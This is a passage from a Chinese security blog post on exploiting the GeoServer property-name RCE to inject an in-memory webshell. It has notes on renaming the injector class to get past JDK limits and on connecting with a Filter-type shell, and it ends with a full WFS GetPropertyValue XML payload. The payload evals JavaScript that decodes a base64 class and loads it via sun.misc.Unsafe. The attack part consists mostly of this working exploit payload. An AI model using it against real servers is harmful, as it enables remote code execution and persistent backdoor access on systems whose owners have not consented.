            src="https://cdn.nlark.com/yuque/0/2024/png/1599908/1720084947981-4e5c8150-2590-489c-a06c-adde4f2f7742.png#averageHue=%23f5f1f1&amp;clientId=u1b3f6587-1bd7-4&amp;from=paste&amp;height=190&amp;id=Yv755&amp;originHeight=380&amp;originWidth=2798&amp;originalType=binary&amp;ratio=2&amp;rotation=0&amp;showTitle=false&amp;size=565637&amp;status=done&amp;style=none&amp;taskId=u635a72ee-e93a-4bc4-8e03-ed4c4fb8fb8&amp;title=&amp;width=1399"
            srcset="https://cdn.nlark.com/yuque/0/2024/png/1599908/1720084947981-4e5c8150-2590-489c-a06c-adde4f2f7742.png#averageHue=%23f5f1f1&amp;clientId=u1b3f6587-1bd7-4&amp;from=paste&amp;height=190&amp;id=Yv755&amp;originHeight=380&amp;originWidth=2798&amp;originalType=binary&amp;ratio=2&amp;rotation=0&amp;showTitle=false&amp;size=565637&amp;status=done&amp;style=none&amp;taskId=u635a72ee-e93a-4bc4-8e03-ed4c4fb8fb8&amp;title=&amp;width=1399, https://cdn.nlark.com/yuque/0/2024/png/1599908/1720084947981-4e5c8150-2590-489c-a06c-adde4f2f7742.png#averageHue=%23f5f1f1&amp;clientId=u1b3f6587-1bd7-4&amp;from=paste&amp;height=190&amp;id=Yv755&amp;originHeight=380&amp;originWidth=2798&amp;originalType=binary&amp;ratio=2&amp;rotation=0&amp;showTitle=false&amp;size=565637&amp;status=done&amp;style=none&amp;taskId=u635a72ee-e93a-4bc4-8e03-ed4c4fb8fb8&amp;title=&amp;width=1399 1.5x, https://cdn.nlark.com/yuque/0/2024/png/1599908/1720084947981-4e5c8150-2590-489c-a06c-adde4f2f7742.png#averageHue=%23f5f1f1&amp;clientId=u1b3f6587-1bd7-4&amp;from=paste&amp;height=190&amp;id=Yv755&amp;originHeight=380&amp;originWidth=2798&amp;originalType=binary&amp;ratio=2&amp;rotation=0&amp;showTitle=false&amp;size=565637&amp;status=done&amp;style=none&amp;taskId=u635a72ee-e93a-4bc4-8e03-ed4c4fb8fb8&amp;title=&amp;width=1399 2x"
            sizes="auto"
            alt="image.png">
    </a></figure>
而JDK8及以下无此限制
<figure><a class="lightgallery" href="https://cdn.nlark.com/yuque/0/2024/png/1599908/1720084925910-28a05f54-e0ce-4134-a7c3-4cda752c8a20.png#averageHue=%23f6f6f6&amp;clientId=u1b3f6587-1bd7-4&amp;from=paste&amp;height=119&amp;id=OXSlW&amp;originHeight=238&amp;originWidth=1268&amp;originalType=binary&amp;ratio=2&amp;rotation=0&amp;showTitle=false&amp;size=160170&amp;status=done&amp;style=none&amp;taskId=u34fb45f6-b407-4db7-9c84-e4b50559b5f&amp;title=&amp;width=634" title="image.png" data-thumbnail="https://cdn.nlark.com/yuque/0/2024/png/1599908/1720084925910-28a05f54-e0ce-4134-a7c3-4cda752c8a20.png#averageHue=%23f6f6f6&amp;clientId=u1b3f6587-1bd7-4&amp;from=paste&amp;height=119&amp;id=OXSlW&amp;originHeight=238&amp;originWidth=1268&amp;originalType=binary&amp;ratio=2&amp;rotation=0&amp;showTitle=false&amp;size=160170&amp;status=done&amp;style=none&amp;taskId=u34fb45f6-b407-4db7-9c84-e4b50559b5f&amp;title=&amp;width=634">
        <img
            
            loading="lazy"
            src="https://cdn.nlark.com/yuque/0/2024/png/1599908/1720084925910-28a05f54-e0ce-4134-a7c3-4cda752c8a20.png#averageHue=%23f6f6f6&amp;clientId=u1b3f6587-1bd7-4&amp;from=paste&amp;height=119&amp;id=OXSlW&amp;originHeight=238&amp;originWidth=1268&amp;originalType=binary&amp;ratio=2&amp;rotation=0&amp;showTitle=false&amp;size=160170&amp;status=done&amp;style=none&amp;taskId=u34fb45f6-b407-4db7-9c84-e4b50559b5f&amp;title=&amp;width=634"
            srcset="https://cdn.nlark.com/yuque/0/2024/png/1599908/1720084925910-28a05f54-e0ce-4134-a7c3-4cda752c8a20.png#averageHue=%23f6f6f6&amp;clientId=u1b3f6587-1bd7-4&amp;from=paste&amp;height=119&amp;id=OXSlW&amp;originHeight=238&amp;originWidth=1268&amp;originalType=binary&amp;ratio=2&amp;rotation=0&amp;showTitle=false&amp;size=160170&amp;status=done&amp;style=none&amp;taskId=u34fb45f6-b407-4db7-9c84-e4b50559b5f&amp;title=&amp;width=634, https://cdn.nlark.com/yuque/0/2024/png/1599908/1720084925910-28a05f54-e0ce-4134-a7c3-4cda752c8a20.png#averageHue=%23f6f6f6&amp;clientId=u1b3f6587-1bd7-4&amp;from=paste&amp;height=119&amp;id=OXSlW&amp;originHeight=238&amp;originWidth=1268&amp;originalType=binary&amp;ratio=2&amp;rotation=0&amp;showTitle=false&amp;size=160170&amp;status=done&amp;style=none&amp;taskId=u34fb45f6-b407-4db7-9c84-e4b50559b5f&amp;title=&amp;width=634 1.5x, https://cdn.nlark.com/yuque/0/2024/png/1599908/1720084925910-28a05f54-e0ce-4134-a7c3-4cda752c8a20.png#averageHue=%23f6f6f6&amp;clientId=u1b3f6587-1bd7-4&amp;from=paste&amp;height=119&amp;id=OXSlW&amp;originHeight=238&amp;originWidth=1268&amp;originalType=binary&amp;ratio=2&amp;rotation=0&amp;showTitle=false&amp;size=160170&amp;status=done&amp;style=none&amp;taskId=u34fb45f6-b407-4db7-9c84-e4b50559b5f&amp;title=&amp;width=634 2x"
            sizes="auto"
            alt="image.png">
    </a></figure>
正好JMG提供了修改注入器类名的功能，这里我们随便起一个java.lang.test的名字
<figure><a class="lightgallery" href="https://cdn.nlark.com/yuque/0/2024/png/1599908/1720082225134-4aec431e-4a24-4760-9a88-00670cd2f898.png#averageHue=%23e3e3e3&amp;clientId=u1b3f6587-1bd7-4&amp;from=paste&amp;height=634&amp;id=u1ac1146f&amp;originHeight=1268&amp;originWidth=1786&amp;originalType=binary&amp;ratio=2&amp;rotation=0&amp;showTitle=false&amp;size=1177548&amp;status=done&amp;style=none&amp;taskId=u591c7976-665e-459d-93d2-a0f649f190a&amp;title=&amp;width=893" title="image.png" data-thumbnail="https://cdn.nlark.com/yuque/0/2024/png/1599908/1720082225134-4aec431e-4a24-4760-9a88-00670cd2f898.png#averageHue=%23e3e3e3&amp;clientId=u1b3f6587-1bd7-4&amp;from=paste&amp;height=634&amp;id=u1ac1146f&amp;originHeight=1268&amp;originWidth=1786&amp;originalType=binary&amp;ratio=2&amp;rotation=0&amp;showTitle=false&amp;size=1177548&amp;status=done&amp;style=none&amp;taskId=u591c7976-665e-459d-93d2-a0f649f190a&amp;title=&amp;width=893">
        <img
            
            loading="lazy"
            src="https://cdn.nlark.com/yuque/0/2024/png/1599908/1720082225134-4aec431e-4a24-4760-9a88-00670cd2f898.png#averageHue=%23e3e3e3&amp;clientId=u1b3f6587-1bd7-4&amp;from=paste&amp;height=634&amp;id=u1ac1146f&amp;originHeight=1268&amp;originWidth=1786&amp;originalType=binary&amp;ratio=2&amp;rotation=0&amp;showTitle=false&amp;size=1177548&amp;status=done&amp;style=none&amp;taskId=u591c7976-665e-459d-93d2-a0f649f190a&amp;title=&amp;width=893"
            srcset="https://cdn.nlark.com/yuque/0/2024/png/1599908/1720082225134-4aec431e-4a24-4760-9a88-00670cd2f898.png#averageHue=%23e3e3e3&amp;clientId=u1b3f6587-1bd7-4&amp;from=paste&amp;height=634&amp;id=u1ac1146f&amp;originHeight=1268&amp;originWidth=1786&amp;originalType=binary&amp;ratio=2&amp;rotation=0&amp;showTitle=false&amp;size=1177548&amp;status=done&amp;style=none&amp;taskId=u591c7976-665e-459d-93d2-a0f649f190a&amp;title=&amp;width=893, https://cdn.nlark.com/yuque/0/2024/png/1599908/1720082225134-4aec431e-4a24-4760-9a88-00670cd2f898.png#averageHue=%23e3e3e3&amp;clientId=u1b3f6587-1bd7-4&amp;from=paste&amp;height=634&amp;id=u1ac1146f&amp;originHeight=1268&amp;originWidth=1786&amp;originalType=binary&amp;ratio=2&amp;rotation=0&amp;showTitle=false&amp;size=1177548&amp;status=done&amp;style=none&amp;taskId=u591c7976-665e-459d-93d2-a0f649f190a&amp;title=&amp;width=893 1.5x, https://cdn.nlark.com/yuque/0/2024/png/1599908/1720082225134-4aec431e-4a24-4760-9a88-00670cd2f898.png#averageHue=%23e3e3e3&amp;clientId=u1b3f6587-1bd7-4&amp;from=paste&amp;height=634&amp;id=u1ac1146f&amp;originHeight=1268&amp;originWidth=1786&amp;originalType=binary&amp;ratio=2&amp;rotation=0&amp;showTitle=false&amp;size=1177548&amp;status=done&amp;style=none&amp;taskId=u591c7976-665e-459d-93d2-a0f649f190a&amp;title=&amp;width=893 2x"
            sizes="auto"
            alt="image.png">
    </a></figure>
终于不报错了，注入成功
<figure><a class="lightgallery" href="https://cdn.nlark.com/yuque/0/2024/png/1599908/1720082281201-1f7ee460-1207-4d63-9c1e-0eeb192e4f8b.png#averageHue=%23ebeaea&amp;clientId=u1b3f6587-1bd7-4&amp;from=paste&amp;height=690&amp;id=ue91a3527&amp;originHeight=1380&amp;originWidth=2466&amp;originalType=binary&amp;ratio=2&amp;rotation=0&amp;showTitle=false&amp;size=1971462&amp;status=done&amp;style=none&amp;taskId=uc6caa90e-bc3c-4d9c-8b8e-328d6fbb838&amp;title=&amp;width=1233" title="image.png" data-thumbnail="https://cdn.nlark.com/yuque/0/2024/png/1599908/1720082281201-1f7ee460-1207-4d63-9c1e-0eeb192e4f8b.png#averageHue=%23ebeaea&amp;clientId=u1b3f6587-1bd7-4&amp;from=paste&amp;height=690&amp;id=ue91a3527&amp;originHeight=1380&amp;originWidth=2466&amp;originalType=binary&amp;ratio=2&amp;rotation=0&amp;showTitle=false&amp;size=1971462&amp;status=done&amp;style=none&amp;taskId=uc6caa90e-bc3c-4d9c-8b8e-328d6fbb838&amp;title=&amp;width=1233">
        <img
            
            loading="lazy"
            src="https://cdn.nlark.com/yuque/0/2024/png/1599908/1720082281201-1f7ee460-1207-4d63-9c1e-0eeb192e4f8b.png#averageHue=%23ebeaea&amp;clientId=u1b3f6587-1bd7-4&amp;from=paste&amp;height=690&amp;id=ue91a3527&amp;originHeight=1380&amp;originWidth=2466&amp;originalType=binary&amp;ratio=2&amp;rotation=0&amp;showTitle=false&amp;size=1971462&amp;status=done&amp;style=none&amp;taskId=uc6caa90e-bc3c-4d9c-8b8e-328d6fbb838&amp;title=&amp;width=1233"
            srcset="https://cdn.nlark.com/yuque/0/2024/png/1599908/1720082281201-1f7ee460-1207-4d63-9c1e-0eeb192e4f8b.png#averageHue=%23ebeaea&amp;clientId=u1b3f6587-1bd7-4&amp;from=paste&amp;height=690&amp;id=ue91a3527&amp;originHeight=1380&amp;originWidth=2466&amp;originalType=binary&amp;ratio=2&amp;rotation=0&amp;showTitle=false&amp;size=1971462&amp;status=done&amp;style=none&amp;taskId=uc6caa90e-bc3c-4d9c-8b8e-328d6fbb838&amp;title=&amp;width=1233, https://cdn.nlark.com/yuque/0/2024/png/1599908/1720082281201-1f7ee460-1207-4d63-9c1e-0eeb192e4f8b.png#averageHue=%23ebeaea&amp;clientId=u1b3f6587-1bd7-4&amp;from=paste&amp;height=690&amp;id=ue91a3527&amp;originHeight=1380&amp;originWidth=2466&amp;originalType=binary&amp;ratio=2&amp;rotation=0&amp;showTitle=false&amp;size=1971462&amp;status=done&amp;style=none&amp;taskId=uc6caa90e-bc3c-4d9c-8b8e-328d6fbb838&amp;title=&amp;width=1233 1.5x, https://cdn.nlark.com/yuque/0/2024/png/1599908/1720082281201-1f7ee460-1207-4d63-9c1e-0eeb192e4f8b.png#averageHue=%23ebeaea&amp;clientId=u1b3f6587-1bd7-4&amp;from=paste&amp;height=690&amp;id=ue91a3527&amp;originHeight=1380&amp;originWidth=2466&amp;originalType=binary&amp;ratio=2&amp;rotation=0&amp;showTitle=false&amp;size=1971462&amp;status=done&amp;style=none&amp;taskId=uc6caa90e-bc3c-4d9c-8b8e-328d6fbb838&amp;title=&amp;width=1233 2x"
            sizes="auto"
            alt="image.png">
    </a></figure>
连接的时候发现JMG的Jetty-AntSword-Listener类型似乎有BUG，打进去连接不上
随后换成Filter连接成功
<figure><a class="lightgallery" href="https://cdn.nlark.com/yuque/0/2024/png/1599908/1720082607075-7daa0b98-ec93-46d0-a845-86813365752a.png#averageHue=%23efefef&amp;clientId=u1b3f6587-1bd7-4&amp;from=paste&amp;height=441&amp;id=u60aec003&amp;originHeight=882&amp;originWidth=1558&amp;originalType=binary&amp;ratio=2&amp;rotation=0&amp;showTitle=false&amp;size=668762&amp;status=done&amp;style=none&amp;taskId=u0249f25a-ea67-4f7b-b7a0-5fcda04444b&amp;title=&amp;width=779" title="image.png" data-thumbnail="https://cdn.nlark.com/yuque/0/2024/png/1599908/1720082607075-7daa0b98-ec93-46d0-a845-86813365752a.png#averageHue=%23efefef&amp;clientId=u1b3f6587-1bd7-4&amp;from=paste&amp;height=441&amp;id=u60aec003&amp;originHeight=882&amp;originWidth=1558&amp;originalType=binary&amp;ratio=2&amp;rotation=0&amp;showTitle=false&amp;size=668762&amp;status=done&amp;style=none&amp;taskId=u0249f25a-ea67-4f7b-b7a0-5fcda04444b&amp;title=&amp;width=779">
        <img
            
            loading="lazy"
            src="https://cdn.nlark.com/yuque/0/2024/png/1599908/1720082607075-7daa0b98-ec93-46d0-a845-86813365752a.png#averageHue=%23efefef&amp;clientId=u1b3f6587-1bd7-4&amp;from=paste&amp;height=441&amp;id=u60aec003&amp;originHeight=882&amp;originWidth=1558&amp;originalType=binary&amp;ratio=2&amp;rotation=0&amp;showTitle=false&amp;size=668762&amp;status=done&amp;style=none&amp;taskId=u0249f25a-ea67-4f7b-b7a0-5fcda04444b&amp;title=&amp;width=779"
            srcset="https://cdn.nlark.com/yuque/0/2024/png/1599908/1720082607075-7daa0b98-ec93-46d0-a845-86813365752a.png#averageHue=%23efefef&amp;clientId=u1b3f6587-1bd7-4&amp;from=paste&amp;height=441&amp;id=u60aec003&amp;originHeight=882&amp;originWidth=1558&amp;originalType=binary&amp;ratio=2&amp;rotation=0&amp;showTitle=false&amp;size=668762&amp;status=done&amp;style=none&amp;taskId=u0249f25a-ea67-4f7b-b7a0-5fcda04444b&amp;title=&amp;width=779, https://cdn.nlark.com/yuque/0/2024/png/1599908/1720082607075-7daa0b98-ec93-46d0-a845-86813365752a.png#averageHue=%23efefef&amp;clientId=u1b3f6587-1bd7-4&amp;from=paste&amp;height=441&amp;id=u60aec003&amp;originHeight=882&amp;originWidth=1558&amp;originalType=binary&amp;ratio=2&amp;rotation=0&amp;showTitle=false&amp;size=668762&amp;status=done&amp;style=none&amp;taskId=u0249f25a-ea67-4f7b-b7a0-5fcda04444b&amp;title=&amp;width=779 1.5x, https://cdn.nlark.com/yuque/0/2024/png/1599908/1720082607075-7daa0b98-ec93-46d0-a845-86813365752a.png#averageHue=%23efefef&amp;clientId=u1b3f6587-1bd7-4&amp;from=paste&amp;height=441&amp;id=u60aec003&amp;originHeight=882&amp;originWidth=1558&amp;originalType=binary&amp;ratio=2&amp;rotation=0&amp;showTitle=false&amp;size=668762&amp;status=done&amp;style=none&amp;taskId=u0249f25a-ea67-4f7b-b7a0-5fcda04444b&amp;title=&amp;width=779 2x"
            sizes="auto"
            alt="image.png">
    </a></figure></p>
<p>注入内存马Payload</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span><span class="lnt">11
</span><span class="lnt">12
</span><span class="lnt">13
</span><span class="lnt">14
</span><span class="lnt">15
</span><span class="lnt">16
</span><span class="lnt">17
</span><span class="lnt">18
</span><span class="lnt">19
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">&lt;wfs:GetPropertyValue service=&#39;WFS&#39; version=&#39;2.0.0&#39;
</span></span><span class="line"><span class="cl"> xmlns:topp=&#39;http://www.openplans.org/topp&#39;
</span></span><span class="line"><span class="cl"> xmlns:fes=&#39;http://www.opengis.net/fes/2.0&#39;
</span></span><span class="line"><span class="cl"> xmlns:wfs=&#39;http://www.opengis.net/wfs/2.0&#39;&gt;
</span></span><span class="line"><span class="cl">  &lt;wfs:Query typeNames=&#39;sf:archsites&#39;/&gt;
</span></span><span class="line"><span class="cl">  &lt;wfs:valueReference&gt;eval(getEngineByName(javax.script.ScriptEngineManager.new(),&#39;js&#39;),&#39;
</span></span><span class="line"><span class="cl">var str=&#34;&#34;;
</span></span><span class="line"><span class="cl">var bt;
</span></span><span class="line"><span class="cl">try {
</span></span><span class="line"><span class="cl">    bt = java.lang.Class.forName(&#34;sun.misc.BASE64Decoder&#34;).newInstance().decodeBuffer(str);
</span></span><span class="line"><span class="cl">} catch (e) {
</span></span><span class="line"><span class="cl">    bt = java.util.Base64.getDecoder().decode(str);
</span></span><span class="line"><span class="cl">}
</span></span><span class="line"><span class="cl">var theUnsafe = java.lang.Class.forName(&#34;sun.misc.Unsafe&#34;).getDeclaredField(&#34;theUnsafe&#34;);
</span></span><span class="line"><span class="cl">theUnsafe.setAccessible(true);
</span></span><span class="line"><span class="cl">unsafe = theUnsafe.get(null);
</span></span><span class="line"><span class="cl">unsafe.defineAnonymousClass(java.lang.Class.forName(&#34;java.lang.Class&#34;), bt, null).newInstance();
</span></span><span class="line"><span class="cl">&#39;)&lt;/wfs:valueReference&gt;
</span></span><span class="line"><span class="cl">&lt;/wfs:GetPropertyValue&gt;
</span></span></code></pre></td></tr></table>
</div>
</div></div>

        

<div class="sponsor">
        <div class="sponsor-avatar"><img
        
        loading="lazy"
        src="/images/avatar.webp"
        srcset="/images/avatar.webp, /images/avatar.webp 1.5x, /images/avatar.webp 2x"
        sizes="auto"
        alt="/images/avatar.webp"
        title="/images/avatar.webp" height="640"   width="640" ></div><p class="sponsor-bio"><em>欢迎加入我的知识星球，共同交流网络安全技术~</em></p><div class="sponsor-custom"><a href="https://t.zsxq.com/FA6urjI" target="_blank"><img src="/zsxq.png" alt="网络安全回收站" style="width:50%;display:inline-block;" ></a></div></div><div class="post-footer" id="post-footer">
    <div class="post-info">
        <div class="post-info-line">
            <div class="post-info-mod">
                <span>更新于 2024-07-04</span>
            </div>
            <div class="post-info-license"></div>
        </div>
        <div class="post-info-line">
            <div class="post-info-md"></div>
            <div class="post-info-share"><button title="分享到 Twitter" data-sharer="twitter" data-url="https://yzddmr6.com/posts/geoserver-memoryshell/" data-title="GeoServer property RCE注入内存马"><span class="fab fa-twitter fa-fw"></span></button><button title="分享到 Facebook" data-sharer="facebook" data-url="https://yzddmr6.com/posts/geoserver-memoryshell/"><span class="fab fa-facebook-square fa-fw"></span></button><button title="分享到 Hacker News" data-sharer="hackernews" data-url="https://yzddmr6.com/posts/geoserver-memoryshell/" data-title="GeoServer property RCE注入内存马"><span class="fab fa-hacker-news fa-fw"></span></button><button title="分享到 Line" data-sharer="line" data-url="https://yzddmr6.com/posts/geoserver-memoryshell/" data-title="GeoServer property RCE注入内存马"><span data-svg-src="/lib/simple-icons/icons/line.min.svg"></span></button><button title="分享到 微博" data-sharer="weibo" data-url="https://yzddmr6.com/posts/geoserver-memoryshell/" data-title="GeoServer property RCE注入内存马"><span class="fab fa-weibo fa-fw"></span></button><button title="分享到 Telegram" data-sharer="telegram" data-url="https://yzddmr6.com/posts/geoserver-memoryshell/" data-title="GeoServer property RCE注入内存马" data-web><span class="fab fa-telegram-plane fa-fw"></span></button><script>
        function shareOnMastodon(title, link) {
            const SHARE_MASTODON_DOMAIN = "share_mastodon_domain"
            const savedDomain = localStorage.getItem(SHARE_MASTODON_DOMAIN) ?? "mastodon.social";
            const domain = prompt("Enter your Mastodon domain", savedDomain);
            if (domain === null) {
                return;
            }
            localStorage.setItem(SHARE_MASTODON_DOMAIN, domain)
            const text = title + "\n\n" + link;
            const url = new URL("https://" + domain)
            url.pathname = "share"
            url.searchParams.append('text', text)
            window.open(url, '_blank', "width=500,height=500,left=500,toolbar=0,status=0");
        }
    </script>
    <button title="分享到 Mastodon"onclick="javascript:shareOnMastodon(&#34;GeoServer property RCE注入内存马&#34;, &#34;https://yzddmr6.com/posts/geoserver-memoryshell/&#34;)"><span class="fab fa-mastodon fa-fw"></span></button></div>
        </div>
    </div>

    <div class="post-info-more">
        <section class="post-tags"></section>
        <section>
            <span><a href="javascript:void(0);" onclick="window.history.back();">返回</a></span>&nbsp;|&nbsp;<span><a href="/">主页</a></span>
        </section>
    </div>

    <div class="post-nav"><a href="/posts/old-phone-for-game/" class="prev" rel="prev" title="旧手机改造游戏机"><i class="fas fa-angle-left fa-fw"></i>旧手机改造游戏机</a>
            <a href="/posts/gzh/" class="next" rel="next" title="[置顶] 搞了个公众号">[置顶] 搞了个公众号<i class="fas fa-angle-right fa-fw"></i></a></div>
</div>
<div id="comments"></div></article></div>
        </main><footer class="footer">
        <div class="footer-container"><div class="footer-line"><i class="far fa-copyright fa-fw"></i><span itemprop="copyrightYear">2019 - 2024</span><span class="author" itemprop="copyrightHolder">&nbsp;<a href="https://github.com/yzddmr6" target="_blank" rel="noopener noreferrer">yzddMr6</a></span>&nbsp;|&nbsp;<span class="license"><a rel="license external nofollow noopener noreffer" href="https://creativecommons.org/licenses/by-nc/4.0/" target="_blank">CC BY-NC 4.0</a></span></div>
            <div class="footer-line"></div>
            <div class="footer-line">
            </div>
        </div></footer></div>

    <div id="fixed-buttons"><a href="#back-to-top" id="back-to-top-button" class="fixed-button" title="回到顶部">
            <i class="fas fa-arrow-up fa-fw"></i>
        </a><a href="#" id="view-comments" class="fixed-button" title="查看评论">
            <i class="fas fa-comment fa-fw"></i>
        </a>
    </div><div class="assets"><script type="text/javascript">window.config={"code":{"copyTitle":"复制到剪贴板","maxShownLines":10},"comment":{},"search":{"algoliaAppID":"5YGRNRQK1G","algoliaIndex":"zh_cn_index","algoliaSearchKey":"0ff6874805de24b84aa1d5ebccad56cd","highlightTag":"em","maxResultLength":10,"noResultsFound":"没有找到结果","snippetLength":50,"type":"algolia"},"sharerjs":true,"table":{"sort":true}};</script><script type="text/javascript" src="/lib/tablesort/tablesort.min.js"></script><script type="text/javascript" src="/lib/clipboard/clipboard.min.js"></script><script type="text/javascript" src="/lib/sharer/sharer.min.js"></script><script type="text/javascript" src="/js/theme.min.js" defer></script></div>
</body>

</html>